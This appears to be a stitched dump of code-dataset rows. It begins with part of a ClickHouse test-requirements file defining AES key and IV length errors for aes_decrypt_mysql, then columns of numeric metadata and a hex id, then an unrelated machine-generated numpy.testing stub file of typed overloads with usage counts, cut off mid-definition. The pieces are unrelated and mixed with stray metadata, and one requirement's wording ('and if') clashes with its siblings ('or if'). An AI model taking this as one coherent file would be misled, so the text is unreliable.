link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-cfb1` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-cfb1` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-cfb8` and `key` is less than 16 bytes\n'
'and if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-cfb8` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-cfb8` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-cfb128` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-cfb128` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-cfb128` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-ofb` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-ofb` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-ofb` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
| 37.935862
| 159
| 0.645518
| 18,004
| 138,997
| 4.834037
| 0.014886
| 0.047431
| 0.065217
| 0.068182
| 0.986051
| 0.983765
| 0.98103
| 0.972838
| 0.960199
| 0.939873
| 0
| 0.046058
| 0.252883
| 138,997
| 3,663
| 160
| 37.946219
| 0.792021
| 0.001547
| 0
| 0.695
| 1
| 0.132647
| 0.4739
| 0.128516
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.000588
| 0.000294
| 0
| 0.000294
| 0.000588
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
242baa1c852fa003a4ec2749346b30bb0c072fa9
| 376,563
|
py
|
Python
|
data/typing/numpy.testing._private.utils.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/numpy.testing._private.utils.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/numpy.testing._private.utils.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
from typing import *
# --- Machine-generated usage record (python-record-api) ----------------------
# Typed `@overload` stubs for `assert_`, one per observed call signature; the
# docstrings record how many call sites were seen per downstream project.
# Overload order is preserved (it is significant for overload resolution).
# NOTE(review): the `numpy`/`scipy` names used in annotations are assumed to be
# imported earlier in this file -- confirm before executing standalone.
@overload
def assert_(val: numpy.bool_):
    """usage.scipy: 503 | usage.skimage: 58"""
@overload
def assert_(val: numpy.bool_, msg: str):
    """usage.scipy: 40 | usage.skimage: 2"""
@overload
def assert_(val: bool):
    """usage.scipy: 901 | usage.skimage: 18"""
@overload
def assert_(val: bool, msg: Literal["1.5.1"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal[""]):
    """usage.scipy: 15"""
@overload
def assert_(val: bool, msg: str):
    """usage.scipy: 84"""
@overload
def assert_(val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.SimpleOscillator, Literal["adams"]]):
    """usage.scipy: 3"""
@overload
def assert_(val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.SimpleOscillator, Literal["bdf"]]):
    """usage.scipy: 3"""
@overload
def assert_(val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.CoupledDecay, Literal["bdf"]]):
    """usage.scipy: 3"""
@overload
def assert_(val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.ComplexExp, Literal["adams"]]):
    """usage.scipy: 3"""
@overload
def assert_(val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.ComplexExp, Literal["bdf"]]):
    """usage.scipy: 3"""
@overload
def assert_(val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.Pi, Literal["adams"]]):
    """usage.scipy: 3"""
@overload
def assert_(val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.Pi, Literal["bdf"]]):
    """usage.scipy: 3"""
@overload
def assert_(val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.CoupledDecay, Literal["adams"]]):
    """usage.scipy: 3"""
@overload
def assert_(val: numpy.bool_, msg: Tuple[int, int, numpy.float64, float]):
    """usage.scipy: 1"""
@overload
def assert_(val: numpy.bool_, msg: Tuple[int, int]):
    """usage.scipy: 3"""
@overload
def assert_(val: numpy.bool_, msg: numpy.float64):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["1877"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.053538"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.105586"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.105546"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.103046"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.066854"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.058661"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.181948"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.087866"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.111942"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.128603"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.188998"]):
    """usage.scipy: 1"""
@overload
def assert_(val: numpy.ndarray):
    """usage.scipy: 9"""
@overload
def assert_(val: int):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: numpy.dtype):
    """usage.scipy: 7"""
@overload
def assert_(val: bool, msg: Literal["expected rank 0"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["Spin 0 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["Spin 1 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["Spin 2 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["Spin 3 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["Spin 4 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["Spin 5 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["Spin 6 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["Spin 7 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["Spin 8 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["Spin 9 failed"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["0"]):
    """usage.scipy: 3"""
@overload
def assert_(val: Tuple[bool, Literal["There are NaN roots"]]):
    """usage.scipy: 1"""
@overload
def assert_(val: numpy.bool_, msg: scipy.optimize.optimize.OptimizeResult):
    """usage.scipy: 3"""
@overload
def assert_(val: bool, msg: scipy.optimize.optimize.OptimizeResult):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Tuple[Tuple[float, float, float], Callable]):
    """usage.scipy: 1"""
# NOTE: the stub generator emitted the `Tuple[List[int], Callable]` overload
# twice with identical signatures (redundant for overload resolution); the
# duplicates are merged here and their recorded call counts summed (1 + 1).
@overload
def assert_(val: bool, msg: Tuple[List[int], Callable]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_(
    val: bool, msg: Tuple[Tuple[float, float, float, float], Callable]
):
    """
    usage.scipy: 1
    """
    ...
# Continuation of the machine-generated `assert_` usage record; each docstring
# gives the observed per-project call counts for that signature.  The final,
# non-overload definition is the catch-all runtime stub.
@overload
def assert_(val: bool, msg: int):
    """usage.scipy: 27"""
@overload
def assert_(val: bool, msg: bytes):
    """usage.scipy: 4"""
@overload
def assert_(val: bool, msg: Literal["Number of Taps"]):
    """usage.scipy: 1"""
@overload
def assert_(val: numpy.bool_, msg: Literal["Zero at zero and pi"]):
    """usage.scipy: 1"""
@overload
def assert_(val: numpy.bool_, msg: Tuple[numpy.float64, int, int]):
    """usage.scipy: 1"""
@overload
def assert_(val: numpy.bool_, msg: Literal["k=None"]):
    """usage.scipy: 2"""
@overload
def assert_(val: numpy.bool_, msg: Literal["k=1"]):
    """usage.scipy: 2"""
@overload
def assert_(val: numpy.bool_, msg: Literal["k=2"]):
    """usage.scipy: 2"""
@overload
def assert_(val: numpy.bool_, msg: Literal["k=40"]):
    """usage.scipy: 2"""
@overload
def assert_(val: numpy.bool_, msg: Literal["k=42"]):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: float):
    """usage.scipy: 2"""
@overload
def assert_(val: bool, msg: Literal["[2]"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["[3]"]):
    """usage.scipy: 1"""
@overload
def assert_(val: scipy.sparse.csr.csr_matrix):
    """usage.scipy: 1"""
@overload
def assert_(val: scipy.sparse.csc.csc_matrix):
    """usage.scipy: 1"""
@overload
def assert_(val: scipy.sparse.lil.lil_matrix):
    """usage.scipy: 1"""
@overload
def assert_(val: scipy.sparse.coo.coo_matrix):
    """usage.scipy: 1"""
@overload
def assert_(val: scipy.sparse.dia.dia_matrix):
    """usage.scipy: 1"""
@overload
def assert_(val: scipy.sparse.bsr.bsr_matrix):
    """usage.scipy: 1"""
@overload
def assert_(val: numpy.bool_, msg: numpy.int64):
    """usage.scipy: 1"""
@overload
def assert_(val: numpy.bool_, msg: Tuple[float, int]):
    """usage.scipy: 2"""
@overload
def assert_(val: numpy.bool_, msg: Tuple[int, float]):
    """usage.scipy: 1"""
@overload
def assert_(val: numpy.bool_, msg: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["ftest Entropy is nan"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["fppf private is nan"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["ttest Entropy is nan"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["tppf private is nan"]):
    """usage.scipy: 1"""
@overload
def assert_(val: bool, msg: Literal["<class 'int'>"]):
    """usage.scipy: 1"""
def assert_(val: object, msg: object = ...):
    """usage.scipy: 1706 | usage.skimage: 78"""
# Machine-generated usage record for `assert_allclose`: one `@overload` per
# observed call signature, with per-project call counts in the docstrings.
# Overload order is preserved; annotations are reproduced verbatim.
@overload
def assert_allclose(actual: numpy.float64, desired: int, atol: float):
    """usage.matplotlib: 4 | usage.scipy: 50 | usage.skimage: 1 | usage.sklearn: 2"""
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, atol: float):
    """usage.scipy: 68 | usage.skimage: 15 | usage.sklearn: 2"""
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, rtol: float):
    """usage.matplotlib: 3 | usage.scipy: 298 | usage.skimage: 11 | usage.sklearn: 70"""
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray):
    """usage.matplotlib: 22 | usage.scipy: 871 | usage.skimage: 57 | usage.sklearn: 264 | usage.xarray: 21"""
@overload
def assert_allclose(actual: float, desired: float, atol: float):
    """usage.scipy: 27 | usage.skimage: 3"""
@overload
def assert_allclose(actual: float, desired: numpy.float64, atol: float):
    """usage.scipy: 1 | usage.skimage: 3"""
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[float]):
    """usage.matplotlib: 3 | usage.scipy: 88 | usage.skimage: 6 | usage.sklearn: 6"""
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, atol: int):
    """usage.scipy: 15 | usage.skimage: 1 | usage.sklearn: 2"""
@overload
def assert_allclose(actual: numpy.ndarray, desired: int):
    """usage.matplotlib: 2 | usage.scipy: 16 | usage.skimage: 22 | usage.sklearn: 1"""
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.float64):
    """usage.scipy: 102 | usage.skimage: 2 | usage.sklearn: 21"""
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, atol: float):
    """usage.matplotlib: 100 | usage.scipy: 238 | usage.skimage: 31 | usage.sklearn: 27"""
@overload
def assert_allclose(actual: numpy.int64, desired: int, atol: float):
    """usage.skimage: 1"""
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: float):
    """usage.scipy: 128 | usage.skimage: 1 | usage.sklearn: 7"""
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[float, float]):
    """usage.scipy: 3 | usage.skimage: 1"""
@overload
def assert_allclose(actual: numpy.float64, desired: int):
"""
usage.matplotlib: 1
usage.scipy: 20
usage.skimage: 1
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int, rtol: float, atol: float):
"""
usage.scipy: 2
usage.skimage: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.float64], atol: float):
"""
usage.scipy: 2
usage.skimage: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.float64):
"""
usage.scipy: 37
usage.sklearn: 1
usage.xarray: 3
"""
...
@overload
def assert_allclose(
actual: pandas.core.indexes.range.RangeIndex,
desired: xarray.core.dataarray.DataArray,
):
"""
usage.xarray: 7
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float):
"""
usage.scipy: 111
usage.sklearn: 5
usage.xarray: 3
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float):
"""
usage.scipy: 75
usage.sklearn: 2
usage.xarray: 1
"""
...
@overload
def assert_allclose(actual: object, desired: object):
"""
usage.xarray: 1
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.int64):
"""
usage.sklearn: 1
usage.xarray: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, atol: float
):
"""
usage.scipy: 211
usage.sklearn: 15
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, atol: float):
"""
usage.matplotlib: 1
usage.scipy: 67
usage.sklearn: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[float], rtol: float, atol: float
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, atol: numpy.float128
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, atol: numpy.float64
):
"""
usage.scipy: 292
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: int, atol: float
):
"""
usage.scipy: 15
usage.sklearn: 3
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: int, atol: float):
"""
usage.scipy: 20
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int, rtol: int, atol: float):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, rtol: int, atol: float
):
"""
usage.scipy: 3
usage.sklearn: 2
"""
...
@overload
def assert_allclose(actual: float, desired: float, rtol: int, atol: float):
"""
usage.scipy: 19
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[int], rtol: float):
"""
usage.scipy: 24
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["sol1 != sol2"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["sol1 != sol3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["sol3 != sol4"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["sol1 != sol1ty"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: float):
"""
usage.scipy: 14
usage.sklearn: 3
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64, rtol: int, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: float, atol: int):
"""
usage.scipy: 13
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, rtol: float, atol: int
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 2 k = 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 2 k = 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 3 k = 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 2 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 3 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 4 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 2 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 3 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 4 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 5 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.ndarray], desired: numpy.ndarray, rtol: float, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[List[numpy.ndarray]], desired: numpy.ndarray, rtol: float, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: numpy.ndarray, atol: float):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.ndarray, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, atol: float):
"""
usage.scipy: 30
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, rtol: float, atol: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: List[numpy.ndarray], desired: List[float], rtol: float, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[Union[int, float]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[float]):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[float], atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.ndarray], desired: List[complex], rtol: float, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, rtol: float, atol: float):
"""
usage.scipy: 8
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64):
"""
usage.scipy: 3
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: float, desired: int, atol: float):
"""
usage.scipy: 9
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["item 0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["item 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["item 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["item 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: str,
):
"""
usage.scipy: 7
usage.sklearn: 5
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: int,
atol: float,
err_msg: Literal["Function 0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: int,
atol: float,
err_msg: Literal["Function 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: int,
atol: float,
err_msg: Literal["Function 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: int,
atol: float,
err_msg: Literal["Function 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: str
):
"""
usage.scipy: 6
usage.sklearn: 7
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.float64, rtol: float):
"""
usage.scipy: 62
usage.sklearn: 10
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=0"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=1"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=2"]
):
"""
usage.scipy: 1
"""
...
@overload
